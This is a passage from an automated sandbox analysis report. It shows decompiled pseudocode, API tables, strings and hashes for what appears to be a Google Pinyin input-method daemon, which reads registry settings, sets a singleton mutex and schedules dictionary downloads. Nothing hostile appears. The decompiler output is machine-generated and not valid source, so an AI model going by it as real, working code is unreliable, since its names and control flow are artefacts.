							if(L0040EDA0( &_v152,  &_v32,  &_v168, L"Anchor Color Visited") == 0) {
								_t103 = L004499B0( &_v32, _t170);
								if(_t103 != 0xffffffff) {
									 *((intOrPtr*)(_v156 + 0x50)) = _t103;
								}
							}
						}
						_t93 = _v168;
						if(_t93 != 0) {
							_t93 = RegCloseKey(_t93);
						}
					}
					return L004EEDC9(_t93, _t127, _v8 ^ _t170, _t155, _t161, _t168);
				}
			}

0x004492a9
0x004492b0
0x004492b6
0x004492c4
0x004492ca
0x004492ce
0x004492d1
0x004492d4
0x004492d7
0x004492e3
0x00449304
0x00449308
0x00449310
0x00449319
0x00449319
0x00449327
0x0044932f
0x0044935e
0x0044935e
0x0044932f
0x00449373
0x00449376
0x0044938d
0x00449393
0x00449398
0x004493a2
0x004493a2
0x004493a5
0x004493aa
0x004493bd
0x004493c7
0x004493cc
0x004493d9
0x004493e8
0x004493f3
0x004493f7
0x004493f9
0x004493f9
0x004493ea
0x004493ea
0x004493ea
0x00449404
0x0044940a
0x0044940e
0x0044940e
0x004493aa
0x00449411
0x0044941a
0x00449423
0x0044942c
0x00449434
0x0044943a
0x0044944a
0x00449453
0x00449459
0x00449465
0x00449469
0x0044946b
0x0044946f
0x00449477
0x0044947d
0x00449483
0x00449489
0x0044948b
0x00449495
0x00449495
0x0044948b
0x00449469
0x0044949a
0x0044949c
0x004494a1
0x004494a6
0x004494c3
0x004494ce
0x004494da
0x004494df
0x004494e2
0x004494e8
0x00000000
0x004494a8
0x004494ab
0x004494b1
0x00000000
0x00000000
0x004494b3
0x004494b6
0x004494b8
0x004494ba
0x004494bc
0x004494bc
0x004494ed
0x004494f1
0x004494fd
0x004494fe
0x0044950d
0x00449513
0x00449519
0x0044951f
0x00449526
0x00449537
0x00449546
0x0044954a
0x0044954d
0x00449550
0x00449553
0x00449556
0x00449559
0x0044955d
0x0044956a
0x0044956e
0x00449576
0x00449578
0x0044957e
0x0044957e
0x00449576
0x0044958d
0x00449593
0x00449596
0x004495a3
0x004495a7
0x004495af
0x004495b7
0x004495b7
0x004495af
0x004495a3
0x004495ba
0x004495c2
0x004495c5
0x004495c5
0x004495c2
0x004495e1
0x004495e1

APIs

GetClassNameW.USER32 ref: 004492DB
lstrcmpiW.KERNEL32(?,static), ref: 004492EE
GetWindowLongW.USER32(?,000000F0), ref: 00449304
SetWindowLongW.USER32 ref: 00449319
GetWindowLongW.USER32(?,000000F0), ref: 00449325
LoadCursorW.USER32(00000000,00007F89), ref: 00449369
GetParent.USER32(?), ref: 00449380
SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 0044938D
GetStockObject.GDI32(0000000D), ref: 0044939C
_memset.LIBCMT ref: 004493C7
GetObjectW.GDI32(?,0000005C,00000000), ref: 004493D9
CreateFontIndirectW.GDI32(00000000), ref: 00449404
CreateWindowExW.USER32 ref: 0044944D
GetWindowTextLengthW.USER32(?), ref: 0044945F
GetWindowTextW.USER32 ref: 00449483
SendMessageW.USER32(00000000,00000401,00000001,00000000), ref: 004494CE
RegCloseKey.ADVAPI32(?,?), ref: 004495C5

Strings

tooltips_class32, xrefs: 00449443
Anchor Color Visited, xrefs: 00449581
Anchor Color, xrefs: 0044952C
static, xrefs: 004492E5
Software\Microsoft\Internet Explorer\Settings, xrefs: 00449503

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$CreateMessageObjectSendText$ClassCloseCursorFontIndirectLengthLoadNameParentStock_memsetlstrcmpi
String ID: Anchor Color$Anchor Color Visited$Software\Microsoft\Internet Explorer\Settings$static$tooltips_class32
API String ID: 2343168553-2451883503
Opcode ID: 11f265fb00d7e04a6ff597a5e279a4bc4d02a675c06db3ce2979f37eaa3db7b3
Instruction ID: c74647114f2b08ac2143696d2b5cd95c1db251ccf2a1da613707913ac255924e
Opcode Fuzzy Hash: 11f265fb00d7e04a6ff597a5e279a4bc4d02a675c06db3ce2979f37eaa3db7b3
Instruction Fuzzy Hash: AEA1CD70A00704AFEB30CF24CC85BABB7B4AF99710F10455EE90AE7290D778AD46DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00404630, Relevance: 35.4, APIs: 15, Strings: 5, Instructions: 403
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00404630(void __edx, void* __ebp) {
				char _v8;
				char _v12;
				long _v16;
				char _v24;
				signed int _v28;
				char _v36;
				char _v534;
				char _v536;
				char _v548;
				char _v780;
				char _v784;
				char _v788;
				void _v828;
				char _v832;
				char _v844;
				struct _SECURITY_ATTRIBUTES* _v848;
				char _v852;
				short _v864;
				char _v868;
				struct _SECURITY_ATTRIBUTES* _v872;
				char _v888;
				char _v892;
				struct _SECURITY_ATTRIBUTES* _v896;
				char _v912;
				char _v916;
				struct _SECURITY_ATTRIBUTES* _v920;
				char _v936;
				void* _v940;
				char _v944;
				char _v948;
				char _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				intOrPtr _v964;
				short _v972;
				struct _SECURITY_ATTRIBUTES* _v1008;
				struct _SECURITY_ATTRIBUTES* _v1012;
				struct _SECURITY_ATTRIBUTES* _v1016;
				struct _SECURITY_ATTRIBUTES* _v1020;
				struct _SECURITY_ATTRIBUTES* _v1024;
				struct _SECURITY_ATTRIBUTES* _v1028;
				struct _SECURITY_ATTRIBUTES* _v1032;
				struct _SECURITY_ATTRIBUTES* _v1036;
				struct _SECURITY_ATTRIBUTES* _v1040;
				struct _SECURITY_ATTRIBUTES* _v1044;
				struct _SECURITY_ATTRIBUTES* _v1048;
				char _v1052;
				long _v1056;
				void* _v1060;
				struct _SECURITY_ATTRIBUTES* _v1064;
				struct _SECURITY_ATTRIBUTES* _v1068;
				char _v1072;
				char _v1092;
				char _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t124;
				signed int _t126;
				intOrPtr* _t141;
				void* _t152;
				void* _t154;
				void* _t155;
				void* _t157;
				void* _t160;
				void* _t162;
				void* _t164;
				void* _t167;
				void* _t169;
				long _t177;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				int _t189;
				void* _t197;
				void* _t199;
				void* _t208;
				void* _t209;
				void* _t212;
				void* _t219;
				void* _t230;
				void* _t235;
				struct _CRITICAL_SECTION* _t239;
				void* _t241;
				void* _t243;
				char* _t248;
				void* _t255;
				void* _t256;
				void* _t257;
				signed int _t258;
				signed int _t259;
				void* _t260;
				void* _t261;
				void* _t262;
				void* _t263;
				void* _t264;
				void* _t265;
				void* _t267;

				_t256 = __ebp;
				_t227 = __edx;
				_push(0xffffffff);
				_push(0x51db1b);
				_push( *[fs:0x0]);
				_t258 = _t257 - 0x418;
				_t124 =  *0x5596fc; // 0x9d48295
				_v16 = _t124 ^ _t258;
				_push(_t235);
				_t126 =  *0x5596fc; // 0x9d48295
				_push(_t126 ^ _t258);
				 *[fs:0x0] =  &_v12;
				_t243 = CreateMutexW(0, 1, L"GooglePinyinDaemon2Singleton");
				if(_t243 == 0 || GetLastError() != 0xb7) {
					E00404550(0, _t209, _t227, _t235, _t256, __eflags);
					_v536 = 0;
					L004F3CE0( &_v534, 0, 0x206);
					_t259 = _t258 + 0xc;
					L004149B0( &_v536);
					_v916 = 7;
					_v920 = 0;
					_v936 = 0;
					E00405450(L"https://clients2.google.com/ime/pinyin/dicts", 0,  &_v936, 0x2c);
					_v8 = 0;
					_v912 = 0;
					_v892 = 7;
					_v896 = 0;
					E00405450(L"dict_index.zip", 0,  &_v912, 0xe);
					_v12 = 1;
					_v868 = 7;
					_v872 = 0;
					_v888 = 0;
					E00405450(L"dict_index.pb", 0,  &_v888, 0xd);
					_v16 = 2;
					__eflags = 0;
					_t141 =  &_v548;
					_v864 = 0;
					_v844 = 7;
					_v848 = 0;
					_t230 = _t141 + 2;
					do {
						_t212 =  *_t141;
						_t141 = _t141 + 2;
						__eflags = _t212;
					} while (_t212 != 0);
					E00405450( &_v536, 0,  &_v852, _t141 - _t230 >> 1);
					_v8 = 3;
					E00438430(_t256, __eflags,  &_v780);
					_v12 = 4;
					_t248 =  &_v972;
					_v952 = 7;
					_v956 = 0;
					_v972 = 0;
					E00405450(L"GooglePinyinItemDownloader", 0, _t248, 0x1a);
					_t231 =  &_v788;
					_push( &_v788);
					_push( &_v832);
					_t215 = _t248;
					_v16 = 5;
					E00404300(_t248, __eflags);
					_v24 = 7;
					__eflags = _v964 - 8;
					if(_v964 >= 8) {
						_t215 = _v972;
						_push(_v972);
						L004EEDBE();
						_t259 = _t259 + 4;
					}
					_t249 =  &_v828;
					_t152 = E0043C300( &_v828);
					__eflags = _t152;
					if(_t152 != 0) {
						_t154 = CreateThread(0, 0, 0x404620,  &_v828, 0, 0);
						_v1048 = 0;
						__eflags = _t154 - 0xffffffff;
						if(__eflags != 0) {
							_v1048 = _t154;
						}
						_v1044 = 0;
						_v1072 = 0x533080;
						_v1068 = 0;
						_v1064 = 0;
						_v1060 = 0;
						_v1052 = 0;
						_push(8);
						_v16 = 0xa;
						_t155 = L004EF8DA(0, _t215, _t231, 7, _t249, __eflags);
						_t260 = _t259 + 4;
						__eflags = _t155;
						if(__eflags == 0) {
							_t155 = 0;
							__eflags = 0;
						} else {
							 *_t155 = 0x52fddc;
							 *((intOrPtr*)(_t155 + 4)) = E0043B0F0;
						}
						_t216 =  &_v1072;
						E0043A120(0, _t231, __eflags,  &_v1072, 0x2a30, 0x3f480, 0x2a30, _t155);
						_push(8);
						_t157 = L004EF8DA(0,  &_v1072, _t231, 7, _t249, __eflags);
						_t261 = _t260 + 4;
						__eflags = _t157;
						if(__eflags == 0) {
							_t157 = 0;
							__eflags = 0;
						} else {
							 *_t157 = 0x52fddc;
							 *((intOrPtr*)(_t157 + 4)) = E0043B560;
						}
						_t232 =  &_v1072;
						E0043A120(0,  &_v1072, __eflags,  &_v1072, 0x15180, 0x3f480, 0x2a30, _t157);
						__eflags = E00411410(_t216,  &_v1072);
						if(__eflags != 0) {
							_push(0xc);
							_t197 = L004EF8DA(0, _t216, _t232, 7, _t249, __eflags);
							_t267 = _t261 + 4;
							__eflags = _t197;
							if(__eflags == 0) {
								_t197 = 0;
								__eflags = 0;
							} else {
								_t216 =  &_v788;
								 *_t197 = 0x52fdf0;
								 *((intOrPtr*)(_t197 + 4)) = E004044C0;
								 *((intOrPtr*)(_t197 + 8)) =  &_v788;
							}
							_t232 =  &_v1072;
							E0043A120(0,  &_v1072, __eflags,  &_v1072, 0xa8c0, 0xa8c0, 0x1c20, _t197);
							_push(0xc);
							_t199 = L004EF8DA(0, _t216,  &_v1072, 7, _t249, __eflags);
							_t261 = _t267 + 4;
							__eflags = _t199;
							if(__eflags == 0) {
								_t199 = 0;
								__eflags = 0;
							} else {
								 *_t199 = 0x52fe04;
								 *((intOrPtr*)(_t199 + 4)) = 0x43b9d0;
								 *((char*)(_t199 + 8)) = 0;
							}
							E0043A120(0, _t232, __eflags,  &_v1072, 0x1c20, 0x15180, 0x1c20, _t199);
						}
						_push(0xc);
						_t160 = L004EF8DA(0, _t216, _t232, 7, _t249, __eflags);
						_t262 = _t261 + 4;
						__eflags = _t160;
						if(__eflags == 0) {
							_t160 = 0;
							__eflags = 0;
						} else {
							 *_t160 = 0x52fe04;
							 *((intOrPtr*)(_t160 + 4)) =  &M0043B910;
							 *((char*)(_t160 + 8)) = 0;
						}
						_t217 =  &_v1072;
						E0043A120(0, _t232, __eflags,  &_v1072, 0x1c20, 0x15180, 0x1c20, _t160);
						_push(0xc);
						_t162 = L004EF8DA(0,  &_v1072, _t232, 7, _t249, __eflags);
						_t263 = _t262 + 4;
						__eflags = _t162;
						if(__eflags == 0) {
							_t162 = 0;
							__eflags = 0;
						} else {
							 *_t162 = 0x52fe04;
							 *((intOrPtr*)(_t162 + 4)) = 0x43b790;
							 *((char*)(_t162 + 8)) = 0;
						}
						_t233 =  &_v1072;
						E0043A120(0,  &_v1072, __eflags,  &_v1072, 0x1c20, 0x15180, 0x1c20, _t162);
						_push(8);
						_t164 = L004EF8DA(0, _t217,  &_v1072, 7, _t249, __eflags);
						_t264 = _t263 + 4;
						__eflags = _t164;
						if(__eflags == 0) {
							_t164 = 0;
							__eflags = 0;
						} else {
							 *_t164 = 0x52fddc;
							 *((intOrPtr*)(_t164 + 4)) = E00404430;
						}
						E0043A120(0, _t233, __eflags,  &_v1072, 0xf, 0xf, 0, _t164);
						_push(0xc);
						_t167 = L004EF8DA(0, _t217, _t233, 7, _t249, __eflags);
						_t265 = _t264 + 4;
						__eflags = _t167;
						if(__eflags == 0) {
							_t167 = 0;
							__eflags = 0;
						} else {
							_t217 =  &_v1044;
							 *_t167 = 0x52fe18;
							 *((intOrPtr*)(_t167 + 4)) =  &_v1044;
							 *((intOrPtr*)(_t167 + 8)) = E0043C6B0;
						}
						_t234 =  &_v1072;
						E0043A120(0,  &_v1072, __eflags,  &_v1072, 0xe10, 0xe10, 0, _t167);
						_push(8);
						_t169 = L004EF8DA(0, _t217,  &_v1072, 7, _t249, __eflags);
						_t259 = _t265 + 4;
						__eflags = _t169;
						if(__eflags == 0) {
							_t169 = 0;
							__eflags = 0;
						} else {
							 *_t169 = 0x52fddc;
							 *((intOrPtr*)(_t169 + 4)) = E0043A500;
						}
						E0043A120(0, _t234, __eflags,  &_v1072, 0x15180, 0x15180, 0, _t169);
						E0043A200( &_v1092);
						SetProcessWorkingSetSize(GetCurrentProcess(), 0xffffffff, 0xffffffff);
						SetPriorityClass(GetCurrentProcess(), 0x40);
						_v1052 = 0x52fd50;
						_v1048 = 0;
						_v1044 = 0;
						_v1040 = 0;
						_v1036 = 0;
						_v1032 = 0;
						_v1028 = 0;
						_v36 = 0xb;
						_t239 =  *0x55f60c + 0x10;
						_v1060 =  &_v1052;
						EnterCriticalSection(_t239);
						_t177 = GetCurrentThreadId();
						_t227 =  &_v1060;
						_v1056 = _t177;
						L00404EB0( *0x55fd14, __eflags,  &_v1056,  &_v1060);
						LeaveCriticalSection(_t239);
						_t240 =  &_v1060;
						L00403BF0( &_v1060);
						L00403E60();
						E0043A2D0( &_v1100);
						_t183 = _v1044;
						__eflags = _t183;
						if(_t183 != 0) {
							E004EF421(_t183);
							_t259 = _t259 + 4;
							_v1016 = 0;
						}
						_t184 = _v1028;
						_v1012 = 0;
						_v1008 = 0;
						__eflags = _t184;
						if(_t184 != 0) {
							E004EF421(_t184);
							_t259 = _t259 + 4;
							_v1028 = 0;
						}
						_v16 = 9;
						_t185 = _v1068;
						_v1024 = 0;
						_v1020 = 0;
						_v1072 = 0x533080;
						__eflags = _t185;
						if(_t185 != 0) {
							_push(_t185);
							L004EEDBE();
							_t259 = _t259 + 4;
						}
						_v16 = 8;
						_t219 = _v1044;
						_v1068 = 0;
						_v1064 = 0;
						_v1060 = 0;
						__eflags = _t219;
						if(_t219 != 0) {
							_t227 =  *_t219;
							 *((intOrPtr*)( *( *_t219)))(1);
						}
						_t186 = _v1048;
						__eflags = _t186;
						if(_t186 != 0) {
							CloseHandle(_t186);
						}
						_v16 = 4;
						E0043C390(_t240,  &_v832);
						_v16 = 3;
						E00438560( &_v788);
						_push( &_v948);
					} else {
						_v12 = 4;
						E0043C390(7,  &_v828);
						_v12 = 3;
						E00438560( &_v784);
						_t227 =  &_v944;
						_push( &_v944);
					}
					_v16 = 0xffffffff;
					_t189 = L00404C70();
				} else {
					_t189 = CloseHandle(_t243);
				}
				 *[fs:0x0] = _v24;
				_pop(_t241);
				_pop(_t255);
				_pop(_t208);
				return L004EEDC9(_t189, _t208, _v28 ^ _t259, _t227, _t241, _t255);
			}

0x00404630
0x00404630
0x00404630
0x00404632
0x0040463d
0x0040463e
0x00404644
0x0040464b
0x00404654
0x00404655
0x0040465c
0x00404664
0x0040467a
0x0040467e
0x00404699
0x004046ae
0x004046b6
0x004046bb
0x004046c5
0x004046df
0x004046e6
0x004046ed
0x004046f5
0x004046fa
0x00404703
0x00404719
0x00404720
0x00404727
0x0040472c
0x00404744
0x0040474b
0x00404752
0x0040475a
0x0040475f
0x00404767
0x00404769
0x00404770
0x00404778
0x0040477f
0x00404786
0x00404790
0x00404790
0x00404793
0x00404796
0x00404796
0x004047ae
0x004047c2
0x004047cd
0x004047d2
0x004047e3
0x004047e7
0x004047ee
0x004047f5
0x004047fa
0x004047ff
0x00404806
0x0040480e
0x0040480f
0x00404811
0x00404819
0x0040481e
0x00404826
0x0040482e
0x00404830
0x00404834
0x00404835
0x0040483a
0x0040483a
0x0040483d
0x00404844
0x00404849
0x0040484b
0x0040488c
0x00404892
0x00404896
0x00404899
0x0040489b
0x0040489b
0x0040489f
0x004048a3
0x004048ab
0x004048af
0x004048b3
0x004048b7
0x004048bb
0x004048bd
0x004048c5
0x004048ca
0x004048cd
0x004048cf
0x004048e0
0x004048e0
0x004048d1
0x004048d1
0x004048d7
0x004048d7
0x004048f2
0x004048f7
0x004048fc
0x004048fe
0x00404903
0x00404906
0x00404908
0x00404919
0x00404919
0x0040490a
0x0040490a
0x00404910
0x00404910
0x0040492b
0x00404930
0x0040493a
0x0040493c
0x0040493e
0x00404940
0x00404945
0x00404948
0x0040494a
0x00404965
0x00404965
0x0040494c
0x0040494c
0x00404953
0x00404959
0x00404960
0x00404960
0x00404977
0x0040497c
0x00404981
0x00404983
0x00404988
0x0040498b
0x0040498d
0x004049a1
0x004049a1
0x0040498f
0x0040498f
0x00404995
0x0040499c
0x0040499c
0x004049b8
0x004049b8
0x004049bd
0x004049bf
0x004049c4
0x004049c7
0x004049c9
0x004049dd
0x004049dd
0x004049cb
0x004049cb
0x004049d1
0x004049d8
0x004049d8
0x004049ef
0x004049f4
0x004049f9
0x004049fb
0x00404a00
0x00404a03
0x00404a05
0x00404a19
0x00404a19
0x00404a07
0x00404a07
0x00404a0d
0x00404a14
0x00404a14
0x00404a2b
0x00404a30
0x00404a35
0x00404a37
0x00404a3c
0x00404a3f
0x00404a41
0x00404a52
0x00404a52
0x00404a43
0x00404a43
0x00404a49
0x00404a49
0x00404a5f
0x00404a64
0x00404a66
0x00404a6b
0x00404a6e
0x00404a70
0x00404a88
0x00404a88
0x00404a72
0x00404a72
0x00404a76
0x00404a7c
0x00404a7f
0x00404a7f
0x00404a96
0x00404a9b
0x00404aa0
0x00404aa2
0x00404aa7
0x00404aaa
0x00404aac
0x00404abd
0x00404abd
0x00404aae
0x00404aae
0x00404ab4
0x00404ab4
0x00404ad0
0x00404ad9
0x00404aeb
0x00404af6
0x00404afc
0x00404b04
0x00404b08
0x00404b0c
0x00404b10
0x00404b14
0x00404b18
0x00404b1c
0x00404b2e
0x00404b32
0x00404b36
0x00404b3c
0x00404b48
0x00404b4c
0x00404b56
0x00404b5c
0x00404b62
0x00404b66
0x00404b6b
0x00404b74
0x00404b79
0x00404b7d
0x00404b7f
0x00404b82
0x00404b87
0x00404b8a
0x00404b8a
0x00404b8e
0x00404b92
0x00404b96
0x00404b9a
0x00404b9c
0x00404b9f
0x00404ba4
0x00404ba7
0x00404ba7
0x00404bab
0x00404bb3
0x00404bb7
0x00404bbb
0x00404bbf
0x00404bc7
0x00404bc9
0x00404bcb
0x00404bcc
0x00404bd1
0x00404bd1
0x00404bd4
0x00404bdc
0x00404be0
0x00404be4
0x00404be8
0x00404bec
0x00404bee
0x00404bf0
0x00404bf6
0x00404bf6
0x00404bf8
0x00404bfc
0x00404bfe
0x00404c01
0x00404c01
0x00404c0e
0x00404c16
0x00404c22
0x00404c2a
0x00404c36
0x0040484d
0x0040484d
0x00404855
0x00404861
0x00404869
0x0040486e
0x00404875
0x00404875
0x00404c37
0x00404c42
0x0040468d
0x0040468e
0x0040468e
0x00404c4e
0x00404c56
0x00404c57
0x00404c58
0x00404c6d

APIs

CreateMutexW.KERNEL32(00000000,00000001,GooglePinyinDaemon2Singleton,09D48295,?,00000000), ref: 00404674
GetLastError.KERNEL32(?,00000000), ref: 00404680
CloseHandle.KERNEL32(00000000,?,00000000), ref: 0040468E
_memset.LIBCMT ref: 004046B6
CreateThread.KERNEL32 ref: 0040488C

Strings

dict_index.zip, xrefs: 0040470D
https://clients2.google.com/ime/pinyin/dicts, xrefs: 004046D3
GooglePinyinDaemon2Singleton, xrefs: 0040466A
dict_index.pb, xrefs: 00404738
GooglePinyinItemDownloader, xrefs: 004047DE

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Create$CloseErrorHandleLastMutexThread_memset
String ID: GooglePinyinDaemon2Singleton$GooglePinyinItemDownloader$dict_index.pb$dict_index.zip$https://clients2.google.com/ime/pinyin/dicts
API String ID: 2067017847-2067477945
Opcode ID: 989a4f79acc1e761c418b38c8bfce9bed01fa0d7554745251b5d09348078f3ee
Instruction ID: 5a5b24ca35731e1caa48117c7c9ee091826aff0e96ca878040f2ffeb355302aa
Opcode Fuzzy Hash: 989a4f79acc1e761c418b38c8bfce9bed01fa0d7554745251b5d09348078f3ee
Instruction Fuzzy Hash: 31F1B6F15083809FD320DF659885B9BBBE8BF95308F404D3EF689A7291D77899048B5B

Uniqueness

Uniqueness Score: -1.00%

Function 0040D430, Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 243
libraryloaderthreadCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040D430(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v16;
				signed int _v24;
				char _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				char _v1012;
				char _v1016;
				char _v1268;
				char _v1524;
				char _v1528;
				intOrPtr _v1580;
				char* _v1584;
				char* _v1588;
				intOrPtr _v1592;
				char _v1604;
				char* _v1608;
				char* _v1612;
				char _v1616;
				intOrPtr _v1620;
				intOrPtr _v1624;
				char* _v1628;
				intOrPtr _v1652;
				char _v1660;
				intOrPtr _v1664;
				signed int _v1668;
				signed int _v1672;
				char _v2392;
				intOrPtr _v2396;
				char* _v2404;
				char _v2660;
				char _v3168;
				char _v3172;
				char* _v3224;
				char* _v3228;
				char* _v3232;
				intOrPtr _v3236;
				char _v3248;
				char* _v3252;
				char* _v3256;
				char _v3260;
				void* _v3264;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t76;
				signed int _t78;
				_Unknown_base(*)()* _t93;
				void* _t94;
				signed int _t97;
				signed int _t99;
				_Unknown_base(*)()* _t109;
				void* _t111;
				void* _t113;
				intOrPtr _t124;
				intOrPtr _t153;
				char* _t154;
				void* _t155;
				intOrPtr* _t158;
				char _t160;
				void* _t161;
				intOrPtr* _t162;
				signed int _t165;
				signed int _t167;
				signed int _t173;
				signed int _t175;
				signed int _t178;

				_push(0xffffffff);
				_push(0x50ecbb);
				_push( *[fs:0x0]);
				_t167 = (_t165 & 0xfffffff8) - 0x648;
				_t76 =  *0x5596fc; // 0x9d48295
				_v24 = _t76 ^ _t167;
				_push(__ebx);
				_t78 =  *0x5596fc; // 0x9d48295
				_push(_t78 ^ _t167);
				 *[fs:0x0] =  &_v16;
				_t153 = _a4;
				_t124 = _a8;
				_v1620 = _a12;
				E0040D290(_t153,  &_v1616);
				_v8 = 0;
				_t158 = _v1616;
				L004F3CE0( &_v1524, 0, 0x308);
				L004F1E32( &_v1524, 0x80, 0xffffffff, L"%s", _t153);
				L004F1E32( &_v1268, 0x80, 0xffffffff, L"%s", _t124);
				L004F1E32( &_v1012, 0x80, 0xffffffff, L"%s", _v1620);
				_v756 = _a16;
				_v752 = 1;
				L004F3CE0( &_v1604, 0, 0x50);
				L004F3CE0( &_v748, 0, 0x2cc);
				_t173 = _t167 + 0x60;
				_v1612 =  &_v1604;
				_v1608 =  &_v748;
				_v1624 = 0;
				_t93 = GetProcAddress(GetModuleHandleW(L"kernel32"), "RtlCaptureContext");
				if(_t93 != 0) {
					 *_t93( &_v748);
					_v1588 =  &_v1528;
					_v1608 = 0xc0000025;
					_v1592 = 3;
					_v1584 =  &_v1016;
					_v1580 = _v760;
					_v1628 =  &_v1616;
				}
				if( *((intOrPtr*)(_t158 + 0xc)) == 0) {
					_t94 = E0040D7A0(_t158, _v1624,  &_v1524);
				} else {
					_push(GetCurrentThreadId());
					_push(_t158);
					_t94 = E0040D840(_v1624,  &_v1524);
				}
				if(_t94 == 0) {
					_t158 =  *((intOrPtr*)(_t158 + 0x8c));
					if(_t158 == 0) {
						_t94 = L004EEF89();
					} else {
						_t94 =  *_t158(_t153, _t124, _v1620, _a16, _a20);
						_t173 = _t173 + 0x14;
					}
				}
				_push(0);
				E004F15DB(_t94, _t124);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_push(0xffffffff);
				_push(0x50ec7b);
				_push( *[fs:0x0]);
				_t175 = (_t173 & 0xfffffff8) - 0x644;
				_t97 =  *0x5596fc; // 0x9d48295
				_v1668 = _t97 ^ _t175;
				_push(_t158);
				_push(_t153);
				_t99 =  *0x5596fc; // 0x9d48295
				_push(_t99 ^ _t175);
				 *[fs:0x0] =  &_v1660;
				E0040D290(_t153,  &_v3260);
				_v1652 = 0;
				_t160 = _v3260;
				L004F3CE0( &_v3168, 0, 0x308);
				_v2396 = 2;
				L004F3CE0( &_v3248, 0, 0x50);
				_t146 =  &_v2392;
				L004F3CE0( &_v2392, 0, 0x2cc);
				_t178 = _t175 + 0x24;
				_v3256 =  &_v3248;
				_v3252 =  &_v2392;
				_t154 = 0;
				_t109 = GetProcAddress(GetModuleHandleW(L"kernel32"), "RtlCaptureContext");
				if(_t109 != 0) {
					 *_t109( &_v2392);
					_t146 = _v2404;
					_v3252 = 0xc0000025;
					_v3236 = 3;
					_v3232 =  &_v3172;
					_v3228 =  &_v2660;
					_v3224 = _v2404;
					_t154 =  &_v3260;
				}
				if( *((intOrPtr*)(_t160 + 0xc)) == 0) {
					_t111 = E0040D7A0(_t160, _t154,  &_v3168);
				} else {
					_push(GetCurrentThreadId());
					_push(_t160);
					_t146 =  &_v3168;
					_t111 = E0040D840(_t154,  &_v3168);
				}
				if(_t111 != 0) {
					L18:
					_push(0);
					E004F15DB(_t111, _t124);
				} else {
					_t162 =  *((intOrPtr*)(_t160 + 0x90));
					if(_t162 != 0) {
						_t111 =  *_t162();
						goto L18;
					}
				}
				_t113 = E0040D300();
				 *[fs:0x0] = _v1664;
				_pop(_t155);
				_pop(_t161);
				return L004EEDC9(_t113, _t124, _v1672 ^ _t178, _t146, _t155, _t161);
			}

0x0040d436
0x0040d438
0x0040d443
0x0040d444
0x0040d44a
0x0040d451
0x0040d458
0x0040d45b
0x0040d462
0x0040d46a
0x0040d473
0x0040d476
0x0040d47d
0x0040d481
0x0040d491
0x0040d49c
0x0040d4a1
0x0040d4be
0x0040d4db
0x0040d4fc
0x0040d510
0x0040d517
0x0040d522
0x0040d539
0x0040d53e
0x0040d556
0x0040d55a
0x0040d55e
0x0040d56d
0x0040d575
0x0040d57f
0x0040d58c
0x0040d59b
0x0040d5a3
0x0040d5ab
0x0040d5af
0x0040d5b3
0x0040d5b3
0x0040d5bb
0x0040d5de
0x0040d5bd
0x0040d5c7
0x0040d5c8
0x0040d5cd
0x0040d5cd
0x0040d5e5
0x0040d5e7
0x0040d5ef
0x0040d607
0x0040d5f1
0x0040d600
0x0040d602
0x0040d602
0x0040d5ef
0x0040d60c
0x0040d60e
0x0040d613
0x0040d614
0x0040d615
0x0040d616
0x0040d617
0x0040d618
0x0040d619
0x0040d61a
0x0040d61b
0x0040d61c
0x0040d61d
0x0040d61e
0x0040d61f
0x0040d626
0x0040d628
0x0040d633
0x0040d634
0x0040d63a
0x0040d641
0x0040d648
0x0040d649
0x0040d64a
0x0040d651
0x0040d659
0x0040d663
0x0040d673
0x0040d67e
0x0040d683
0x0040d694
0x0040d69f
0x0040d6ac
0x0040d6b6
0x0040d6bb
0x0040d6d3
0x0040d6d7
0x0040d6db
0x0040d6e4
0x0040d6ec
0x0040d6f6
0x0040d6f8
0x0040d70a
0x0040d712
0x0040d71a
0x0040d71e
0x0040d722
0x0040d726
0x0040d726
0x0040d72e
0x0040d74b
0x0040d730
0x0040d736
0x0040d737
0x0040d738
0x0040d73e
0x0040d73e
0x0040d752
0x0040d760
0x0040d760
0x0040d762
0x0040d754
0x0040d754
0x0040d75c
0x0040d75e
0x00000000
0x0040d75e
0x0040d75c
0x0040d76b
0x0040d777
0x0040d77f
0x0040d780
0x0040d792

APIs

